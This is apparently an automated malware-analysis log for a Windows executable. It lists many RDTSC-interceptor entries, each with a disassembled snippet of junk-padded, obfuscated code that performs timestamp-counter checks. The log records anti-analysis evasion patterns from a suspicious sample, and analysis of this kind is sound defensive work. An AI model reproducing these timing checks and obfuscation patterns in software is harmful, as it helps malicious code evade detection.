Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F004A0 second address: 6F004F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B6481Fh 0x00000008 jmp 00007FF6D0B64828h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub eax, eax 0x00000012 jmp 00007FF6D0B64821h 0x00000017 mov dword ptr [esi], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF6D0B6481Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F004F1 second address: 6F00516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+04h], eax 0x0000000d jmp 00007FF6D0B95BEFh 0x00000012 mov dword ptr [esi+08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00516 second address: 6F0051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0051A second address: 6F00535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00535 second address: 6F00596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B6481Fh 0x00000009 sbb ax, CE0Eh 0x0000000e jmp 00007FF6D0B64829h 0x00000013 popfd 0x00000014 jmp 00007FF6D0B64820h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+0Ch], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF6D0B64827h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00596 second address: 6F00602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 13h 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+4Ch] 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 call 00007FF6D0B95BF4h 0x00000016 pushfd 0x00000017 jmp 00007FF6D0B95BF2h 0x0000001c or ecx, 7218BC78h 0x00000022 jmp 00007FF6D0B95BEBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a mov dword ptr [esi+10h], eax 0x0000002d jmp 00007FF6D0B95BEFh 0x00000032 mov eax, dword ptr [ebx+50h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a mov ebx, 74B38884h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00602 second address: 6F00640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 6AC5D98Fh 0x00000008 pushfd 0x00000009 jmp 00007FF6D0B64824h 0x0000000e or ecx, 009BA138h 0x00000014 jmp 00007FF6D0B6481Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esi+14h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov cx, dx 0x00000026 mov ecx, edi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00640 second address: 6F006D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF6D0B95BEEh 0x00000013 add eax, 3EF145F8h 0x00000019 jmp 00007FF6D0B95BEBh 0x0000001e popfd 0x0000001f mov eax, 6CB57F2Fh 0x00000024 popad 0x00000025 mov dword ptr [esi+18h], eax 0x00000028 jmp 00007FF6D0B95BF2h 0x0000002d mov eax, dword ptr [ebx+58h] 0x00000030 jmp 00007FF6D0B95BF0h 0x00000035 mov dword ptr [esi+1Ch], eax 0x00000038 pushad 0x00000039 mov al, CAh 0x0000003b push edx 0x0000003c mov bx, ax 0x0000003f pop ecx 0x00000040 popad 0x00000041 mov eax, dword ptr [ebx+5Ch] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FF6D0B95BF3h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F006D5 second address: 6F006D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F006D9 second address: 6F006DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F006DF second address: 6F006E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F006E5 second address: 6F006E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F006E9 second address: 6F006FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F006FA second address: 6F00709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00709 second address: 6F0070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0070F second address: 6F00713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00713 second address: 6F00726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov edx, 474B8E8Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00726 second address: 6F00778 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF6D0B95BEFh 0x00000008 add ax, B73Eh 0x0000000d jmp 00007FF6D0B95BF9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+24h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF6D0B95BF9h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00778 second address: 6F007AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f mov eax, 68FDFC4Fh 0x00000014 popad 0x00000015 mov dword ptr [esi+28h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF6D0B64821h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F007AF second address: 6F007D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6D0B95BEDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F007D6 second address: 6F00828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b jmp 00007FF6D0B64826h 0x00000010 mov ax, word ptr [ebx+6Ch] 0x00000014 jmp 00007FF6D0B64820h 0x00000019 mov word ptr [esi+30h], ax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF6D0B64827h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00828 second address: 6F00840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B95BF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00840 second address: 6F0086A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dl, ah 0x00000014 jmp 00007FF6D0B64825h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0086A second address: 6F008C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B95BF7h 0x00000009 adc ch, FFFFFF9Eh 0x0000000c jmp 00007FF6D0B95BF9h 0x00000011 popfd 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF6D0B95BF9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F008C6 second address: 6F0090B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 17h 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+0000008Ch] 0x00000010 pushad 0x00000011 mov dl, ch 0x00000013 popad 0x00000014 mov dword ptr [esi+34h], eax 0x00000017 pushad 0x00000018 mov dl, al 0x0000001a push edx 0x0000001b jmp 00007FF6D0B6481Ch 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+18h] 0x00000025 jmp 00007FF6D0B64821h 0x0000002a mov dword ptr [esi+38h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov dl, ah 0x00000032 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0090B second address: 6F00944 instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov cx, di 0x0000000b mov ax, di 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [ebx+1Ch] 0x00000013 jmp 00007FF6D0B95BEFh 0x00000018 mov dword ptr [esi+3Ch], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF6D0B95BF0h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00944 second address: 6F0094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0094A second address: 6F00950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00950 second address: 6F00968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF6D0B6481Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00968 second address: 6F00A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007FF6D0B95BEEh 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF6D0B95BEEh 0x0000001e sub ecx, 7774DA38h 0x00000024 jmp 00007FF6D0B95BEBh 0x00000029 popfd 0x0000002a movzx eax, dx 0x0000002d popad 0x0000002e push 00000001h 0x00000030 jmp 00007FF6D0B95BEBh 0x00000035 nop 0x00000036 pushad 0x00000037 push eax 0x00000038 call 00007FF6D0B95BEBh 0x0000003d pop eax 0x0000003e pop ebx 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007FF6D0B95BF0h 0x00000047 pushfd 0x00000048 jmp 00007FF6D0B95BF2h 0x0000004d and si, 9628h 0x00000052 jmp 00007FF6D0B95BEBh 0x00000057 popfd 0x00000058 popad 0x00000059 nop 0x0000005a jmp 00007FF6D0B95BF6h 0x0000005f lea eax, dword ptr [ebp-10h] 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00A34 second address: 6F00A69 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF6D0B64828h 0x00000008 add ax, AAE8h 0x0000000d jmp 00007FF6D0B6481Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov eax, 29FE89F5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00A69 second address: 6F00AAA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF6D0B95BF2h 0x00000008 adc ax, BD48h 0x0000000d jmp 00007FF6D0B95BEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF6D0B95BF5h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00AAA second address: 6F00ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e mov ecx, edi 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00ACF second address: 6F00AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B21 second address: 6F00B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B25 second address: 6F00B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF6D0B95BF6h 0x0000000c and cx, 6928h 0x00000011 jmp 00007FF6D0B95BEBh 0x00000016 popfd 0x00000017 popad 0x00000018 test edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B5C second address: 6F00B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B60 second address: 6F00B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B66 second address: 6F00B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B6C second address: 6F00B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B70 second address: 6F00B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF741143361h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00B84 second address: 6F00BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B95BF0h 0x00000009 or si, 7DE8h 0x0000000e jmp 00007FF6D0B95BEBh 0x00000013 popfd 0x00000014 jmp 00007FF6D0B95BF8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebp-0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00BCD second address: 6F00BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00BD1 second address: 6F00BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00BD5 second address: 6F00BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00BDB second address: 6F00C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 7251h 0x00000007 pushfd 0x00000008 jmp 00007FF6D0B95BEEh 0x0000000d sbb esi, 406A52A8h 0x00000013 jmp 00007FF6D0B95BEBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f jmp 00007FF6D0B95BF6h 0x00000024 lea eax, dword ptr [ebx+78h] 0x00000027 pushad 0x00000028 call 00007FF6D0B95BEEh 0x0000002d movzx esi, dx 0x00000030 pop edi 0x00000031 mov ecx, 776A8C13h 0x00000036 popad 0x00000037 push 00000001h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00C43 second address: 6F00C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00C47 second address: 6F00C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00C4D second address: 6F00D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 27A1395Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF6D0B6481Ch 0x00000013 jmp 00007FF6D0B64825h 0x00000018 popfd 0x00000019 mov si, EB37h 0x0000001d popad 0x0000001e mov dword ptr [esp], eax 0x00000021 jmp 00007FF6D0B6481Ah 0x00000026 lea eax, dword ptr [ebp-08h] 0x00000029 pushad 0x0000002a mov dx, ax 0x0000002d popad 0x0000002e push ebx 0x0000002f pushad 0x00000030 call 00007FF6D0B64822h 0x00000035 pushfd 0x00000036 jmp 00007FF6D0B64822h 0x0000003b sub si, 09B8h 0x00000040 jmp 00007FF6D0B6481Bh 0x00000045 popfd 0x00000046 pop esi 0x00000047 movsx edi, cx 0x0000004a popad 0x0000004b mov dword ptr [esp], eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007FF6D0B64828h 0x00000057 jmp 00007FF6D0B64825h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00D34 second address: 6F00D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B95BECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00D44 second address: 6F00D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movsx ebx, si 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00E73 second address: 6F00EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF6D0B95BF9h 0x00000008 pop esi 0x00000009 call 00007FF6D0B95BF1h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edi, eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00EAC second address: 6F00EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64827h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00EE9 second address: 6F00EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00EED second address: 6F00EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00EF3 second address: 6F00F1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c mov bh, ch 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 js 00007FF741174389h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c movzx eax, bx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00F1B second address: 6F00F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64824h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6D0B64827h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00F4F second address: 6F00F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF6D0B95BEDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00F7D second address: 6F00F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00F83 second address: 6F00FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f mov cl, 9Eh 0x00000011 popad 0x00000012 mov edx, 775606ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF6D0B95BF4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00FB0 second address: 6F00FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B64821h 0x00000008 mov cx, C257h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f sub eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF6D0B64826h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00FE5 second address: 6F00FEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00FEB second address: 6F00FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00FEF second address: 6F00FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00FF3 second address: 6F0101F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c jmp 00007FF6D0B64829h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0101F second address: 6F01023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01023 second address: 6F01027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01027 second address: 6F0102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0102D second address: 6F01042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64821h 0x00000009 rdtsc
